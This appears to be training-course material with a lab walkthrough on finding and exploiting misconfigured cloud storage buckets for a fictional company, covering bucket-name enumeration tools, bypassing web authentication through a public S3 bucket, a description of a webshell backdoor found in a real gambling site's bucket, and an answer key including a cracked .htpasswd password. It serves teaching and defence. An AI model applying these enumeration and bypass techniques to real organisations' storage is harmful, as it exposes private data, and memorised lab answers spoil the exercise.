Cloud Spotlight: Insecure Storage
Last updated
Last updated
Cloud storage services like AWS S3, Google Cloud buckets, and Azure Blob are crucial for cloud apps. However, they can be major security risks, exposing sensitive data and affecting companies of all sizes, including Netflix, TD Bank, Ford, Walmart, and Capital One.
Early on, cloud storage like AWS S3 was set to public access by default, which led to many data breaches as attackers found unprotected buckets. Now, cloud providers default to restricting access, requiring admins to explicitly allow public access. However, insecure storage services are still common, with sensitive data often left exposed and vulnerable.
Creating a storage bucket is similar across AWS, Google Cloud, and Azure. For AWS, you create an S3 bucket (like falsimentis-media
) in the default region. By default, public access is blocked, but the AWS admin can change this to allow public access.
Many storage buckets are left unprotected and public because administrators may not fully understand the risks of removing security, misuse of access control lists (ACLs), or they start as public but later get private data.
Cloud storage providers offer HTTP access for easy cloud app integration. Each major provider (AWS, Google Cloud, Azure) has its own access URL. For Microsoft Azure, accessing storage Blobs requires an account name and container name, which can be the same.
An attacker can find cloud storage by visiting the URL and guessing the bucket or container name. There are tools that make this process faster and easier.
For AWS S3 buckets, we can access them using the URL or by using BUCKETNAME.s3.amazonaws.com. Both ways work the same, so you can use either to view or access the bucket.
If something is unclear, check the lab solution for a detailed explanation.
Bucket Finder by Robin Wood is a tool for checking AWS S3 buckets. It uses a list of bucket names to see if they exist and if they are public. We can also use it with the --download
option to download all content from public buckets, but be careful as this can result in a lot of data being downloaded.
The example shows that the wordlist file has three lines. Bucket Finder will check each name from this list at the HTTP endpoint (like http://s3.amazonaws.com/microsoft) and report if the bucket exists, is denied access, or is publicly available. Users need to create their own wordlist. Bucket Finder can be downloaded from https://digi.ninja/projects/bucket_finder.php.
GCPBucketBrute scans Google Cloud buckets to find them and check their permissions if allowed. It can use a wordlist to find buckets like Bucket Finder or use a GCP credential (or none with -u) to look at permissions. It also lets you use a keyword with common suffixes to find buckets.
GCPBucketBrute found a publicly accessible GCP bucket named falsimentis-dev
with list and get permissions for anyone. It can't list or download contents, but we can use the gsutil
tool from Google for that. GCPBucketBrute, made by Spencer Gietzen from Rhino Security Labs, is available at GitHub.
Basic Blob Finder is a tool for scanning and finding Azure Blobs, similar to Bucket Finder. It uses a list of strings where each entry can either be a combined account and container name or separated by a colon to specify the account and container names individually.
Basic Blob Finder finds public Azure Blobs and lists their files. For example, it can find an account and container named falsimentis
and falsimentis-container
, respectively, and list a WAV file inside. You can get it from this link.
To show the risk of unprotected buckets, consider this example: I used the top 10,000 websites and their subdomains as bucket names (e.g., microsoft.com becomes microsoft, cnn.com becomes cnn, etc.) and used a tool to search for these bucket names on Google Cloud. The scan took about 60 hours to check 1,216 possible names for each keyword.
The scan found 2,951 publicly accessible buckets, about 30% of the total. Out of these, 64 were badly misconfigured, letting anyone change bucket permissions. For example, one bucket had full permissions like setting policies, listing, getting, creating, deleting, and updating. Many unprotected buckets were easily found, and attackers could exploit these vulnerabilities further.
The (redacted) bucket can be listed, so an attacker can see and download all its files. Most public buckets only have this risk, meaning they expose information. However, this bucket also lets attackers upload files.
I used gsutil to list the files in the bucket and found hundreds, showing it's used for an online gambling site to share images and JavaScript. Among the files, I found JSP scripts like FxCodeShell.jsp, a server-side language. The script was added in 2019.
The FxCodeShell.jsp script is a webshell that lets an attacker log in and run commands on the web server. The web server runs the script, not the cloud storage server, though it likely syncs files with the cloud.
The older date stamp in the GCP bucket shows that the attacker found a vulnerability allowing file uploads. Visiting the site using the bucket and accessing FxCodeShell.jsp returned a response of "2," indicating the server runs Linux, which is confirmed in the source code.
An attacker can use malicious code to download and run any executable on the web server by entering a backdoor password in the view=
argument and a malicious URL in the address=
argument. It's unclear how the backdoor was deployed or exploited without more details. The attacker may have found a writable bucket with setIamPolicy
access and used it to gain code execution on the server. The website with the backdoor and insecure bucket hasn’t responded to breach reports yet.
Attackers can find insecure buckets by using bucket discovery tools and a wordlist for scanning. While default wordlists like Daniel Miessler's SecLists are available, discovering new buckets often requires using creative naming ideas.
For example, if an attacker is targeting a company like Falsimentis Corporation to find unprotected buckets, they would consider all possible abbreviations and variations of the company name. They would also add common prefixes and suffixes, similar to what a cloud admin might use. While tools like GCPBucketBrute can do some of this automatically, it's best for an analyst to use OSINT resources and think like a cloud admin when searching for unsecured buckets.
Defenders can use logging tools to spot hostname or URL patterns linked to cloud storage services. This can include DNS logs (for Azure Blobs and some S3 buckets), HTTP proxy logs (AWS, Azure, Google), and network packet data. Google Cloud Buckets don't have unique DNS names, so they won't appear in DNS logs.
Most cloud storage tools use TLS encryption for HTTP traffic, but they still reveal the server name in the HTTP Server Name Indication (SNI) field. This can help identify the cloud provider and bucket name, like Azure Blobs or some S3 services.
If your organization uses cloud storage, you need to set up logging for it. Many cloud providers don’t enable this by default, so the cloud admin must specify a separate bucket for logging access. Without these logs, it’s hard to know who accessed the data and what they did with it. This is crucial for both public and access-controlled storage to understand the impact of any unauthorized access.
Cloud storage logs work with many SIEM tools and Elastic Stack via the Filebeat module. For a simpler approach, logs can be downloaded locally and converted to a spreadsheet format using Rob Clarke’s s3logparse (https://pypi.org/project/s3-log-parse/). The example shows creating a temporary directory for S3 logs, copying logs from the sec504-erk-logging
bucket, and converting them to a tab-separated values file.
In this lab, we will use the simulated cloud environment to identify and assess the threat of miscongured cloud storage buckets.
In this lab, we will use our Slingshot Linux VM to attack a simulated AWS S3 cloud storage bucket service. We will use different techniques to identify the presence of cloud storage bucket services, interacting with these endpoints to enumerate access and access sensitive data disclosed in the cloud service.
From the Slingshot Linux terminal, let's run gos3
to launch the simulated cloud environment.
Slingshot Linux has been preconfigured with simulated AWS credentials. We cna find the file at ~/.aws/credentials.
Let's see how to use the AWS command line tool aws
for S3 services. It lets you work with S3 buckets like you do with local files. With aws s3
, you can create buckets (mb
), list files (ls
), copy files (cp
), move files (mv
), and more.
First, let's create a new bucket called mybucket.
Let's break down the command:
aws
: Run the AWS command line tool
s3
: Tell the AWS command line tool to interact with S3 cloud storage bucket services
mb
: Run the make bucket S3 operation
s3://mybucket
: Use the S3 URI prefix s3://
with the bucket name mybucket
to create the bucket.
When we run the command, we get an error saying the bucket mybucket
already exists. This shows that bucket names in cloud storage must be unique across all users. We can't have two buckets with the same name, even if they're owned by different people; all S3 bucket names must be unique globally.
Let's rerun the ame command and change the name to mybucket2
.
We can create the bucket mybucket2
because no one else has used that name yet. The first person to create it gets the name.
Next, let's upload a file to the new S3 bucket. First, let's make a text file by saving the output of ps -ef
to a file named pslist.txt
.
We don't care about the file's contents; we just need a file to copy to the S3 bucket.
Next, let's copy the file from the local file system to the S3 bucket.
We added a trailing slash / to the destination URI, which isn’t needed because the copy process will add it automatically. However, it shows that the target S3 URI can just be a bucket name or a full path. For example, using s3://mybucket2/dir1/dir2/pslist.txt
will let S3 create the necessary directories for us.
Next, let's list the bucket to see the copied file.
Next, we'll apply what we've learned to evaluate the S3 buckets used by Falsimentis Corporation.
Let's navigate to the Falsimentis website at http://www.falsimentis.com.
Let's click on the About link, find the Meet Our CEO section, and hover over the Download Company Profile button.
Notice that the link to the company profile has a different URL: http://www.falsimentis.com.s3.amazonaws.com/company-prole.pdf
Many websites use cloud storage buckets to host or distribute static files. For AWS, we can set up a bucket so that it's publicly accessible via a URL like bucketname.s3.amazonaws.com
. For example, the website www.falsimentis.com
is hosted on an S3 bucket at www.falsimentis.com.s3.amazonaws.com
.
Since we found an S3 bucket for the Falsimentis website, we can try accessing it with the AWS command line tool.
The AWS command line tool shows that the www.falsimentis.com
bucket is set to public access. This might seem obvious because the bucket hosts the company's website (as seen with index.html and other web files). However, using the S3 service to access the bucket can reveal extra files and access not visible from just browsing the website.
The output shows multiple directories, including one called "protected". Let's check that directory.
When we try to access www.falsimentis.com/protected
, it asks for a username and password. This means the admin is protecting the server with authentication. However, our S3 access via the AWS command line doesn't use this same authentication, so we can bypass it.
Here, we see the protected directory contents, which include the .htpasswd file (storing usernames and passwords for website access) and a JSON file named sales-status.json.
We can access these files because we bypass the web server's authentication by directly accessing the public S3 bucket where the files are stored.
Next, let's use the sync command to download the contents of the /protected directory from the web server.
We have retrieved the protected files from the www.falsimentis.com web server, bypassing the HTTP authentication requirement.
In the www.falsimentis.com example, we found the S3 bucket through a PDF link on the site. Attackers can also guess bucket names to find them. In the rest of the lab, we'll use the bucket_finder tool by RobinWood to find both public and private S3 buckets. This method also works for Azure Blob storage and Google Compute Buckets with the right discovery tools.
An attacker uses a tool to guess bucket names by trying a list of names. The tool checks if the name is a real bucket and also looks at the bucket's security.
First, let's display the contents of the ~/labs/s3/shortlist.txt le
This file has three bucket names: mybucket (which we know exists), mybucket2 (the one you created), and sans (whose existence we’re unsure of). Let's run the bucket_finder.rb
script with this list of buckets as the only argument, like this.
The tool correctly showed that "mybucket" and "mybucket2" exist, but "sans" does not.
Bucket_finder shows that mybucket2 gives an "access denied" error when listing its files. This is important: bucket discovery tools don't use your account's permissions to find buckets. They only check public access to see if buckets exist and try to get data from ones that are accessible.
Run the attack again with bucket_finder using a longer bucket names list from ~/labs/s3/bucketlist.txt, saving the results to a file called bucketlist1-output.txt using the tee command.
When using the bucket_finder tool, we might frequently see "Bucket does not exist: ...". The tool checks many buckets, so it’s easy to overlook when it finds a real bucket.
To remove messages about unidentified buckets, let's use grep
on the bucketlist1s.txt
file as shown.
Filtering out lines that say "does not exist" gives us clearer results. We find 5 new S3 buckets: 4 are private, but the "movies" bucket is public. Using Bucket_finder, we can see the files in this public bucket, including "movies.json".
For cloud bucket discovery, an attacker can use a list of potential bucket names to find those that exist and are publicly accessible. However, this approach is not targeted, meaning the buckets found may not belong to Falsimentis Corporation. To focus on Falsimentis, we need to generate a tailored list of bucket names for more accurate results.
To make a custom list of bucket names, we'll use the company name (falsimentis) as the start and add common bucket endings to it.
Let's repeat the bucket_finder attack using the bucketlist2.txt file this time.
Let's remove the messages about unidentified buckets.
We've found a new bucket, probably used by Falsimentis, called falsimentis-eng. It's also protected, so we can't access it.
Next, we'll use CeWL to create a custom wordlist by crawling a website.
Amazon S3 bucket names can only include lowercase letters, numbers, dots, or hyphens. To use a CeWL wordlist, let's convert all uppercase letters to lowercase with the tr
command.
Now, let's make a custom bucket name list with CeWL suffixes using the Awk command, as shown.
Let's repeat the bucket_finder attack again, but using the bucketlist3.txt file this time.
Let's exclude the lines that contain the string "does not exist".
With the third bucket list from CeWL, we found a new bucket called falsimentis-ai
containing several images. These files are publicly available, so we can download them using the AWS command line tool or view them in Firefox using the provided URLs.
In this lab, we learned how attackers find insecure cloud storage buckets. Since each bucket name must be unique, attackers can guess names and check their access. Tools like bucket_finder and the AWS CLI make this easy. The challenge is creating a list of names to guess. Attackers can use clues from the target organization, like cloud service links or metadata, to build this list. After finding a bucket, they use the AWS CLI to check if it’s public and writable.
As defenders, we need to know these ideas to spot risky cloud storage in our own companies and create policies to protect sensitive data.
We used Awk commands to create bucket lists with "falsimentis-" as a prefix and CeWL keywords. Bucket names might have the company name and a hyphen, or they might use different separators like dots or none at all (AWS S3 buckets can use various separators).
Think about creating a new list of bucket names by combining CeWL data with prefixes, suffixes, and different separators.
1) What is the yet-undiscovered Falsimentis bucket name disclosing several images?
Let's use the bucketlist4.txt file to identify any new Falsimentis buckets.
Answer: cats-falsimentis
2) Of all the identified buckets, which ones are writable?
A cloud storage bucket might allow anyone to write to it, regardless of other settings. To check if we can write to it, first see if the bucket exists with bucket_finder
, then try copying a file to it using the AWS command line tool.
The copy fails because the bucket is not writable. We can use this approach with other buckets too. Let’s use the AWS tool to copy to the other buckets we found in this lab.
Answer: www.falsimentis.com
3) Identify one final publicly-accessible Falsimentis bucket that discloses customer data. How many customer records are disclosed in the Falsimentis customer data bucket?
We can find the final Falsimentis bucket in a few ways. The hint says it’s a customer data bucket, so think of names with "cust" or "customer" in them. We can also use Awk to create a new list of bucket names by mixing prefixes and suffixes from the original bucketlist.txt
.
Let's use the new bucket list to find the Falsimentis customer bucket.
The Bucket_finder
shows the bucket contains one file called customer-pipeline-Q3.json
. Let's use the AWS command line tool to get the file.
The customer-pipeline-Q3.json
file contains a list of JSON records, all formatted in a single line of text.
JSON files are often in one line because they don't require line breaks. Using cat
will show the data as one long line, making it hard to read. Instead, we can use jq
to view and understand the data structure more easily.
By using JQ to check the data format, we find that the JSON file is a list of customer records. With JQ, we can count how many records are in the list using the length
function.
Answer: 421
4) We found that the /protected
folder on the www.falsimentis.com site revealed a JSON file and a .htpasswd file. The .htpasswd file contains a password hash used to control access to the /protected
section of the website.
What is the username and plaintext password that grants access to www.falsimentis.com/protected
?
Let's examine the password hash information using cat
.
The username is lwatsham
, and then there's a password hash. The dollar sign separates the parts of the hash, like in a Linux /etc/shadow
file. Here, apr1
is the hash type, KYxkC7nP
is the salt, and EcuHm3.iStKpM6P8ix0DN1
is the password hash.
The apr1 identifier is for Apache HTTP digest authentication files. It uses MD5 with 1000 iterations to make password cracking harder.
Let's use the --identify
option to find out the Hashcat mode for Apache HTTP digest authentication hashes.
When using Hashcat, make sure the hash is on its own line, including hash type and salt. If we run Hashcat with the .htpasswd file as it is, we'll get an error.
The "no hash-mode matches" error happens because the username is before the password hash. Let's use the --user
option in Hashcat to indicate that the username comes before the password hash.
Answer: hoera1991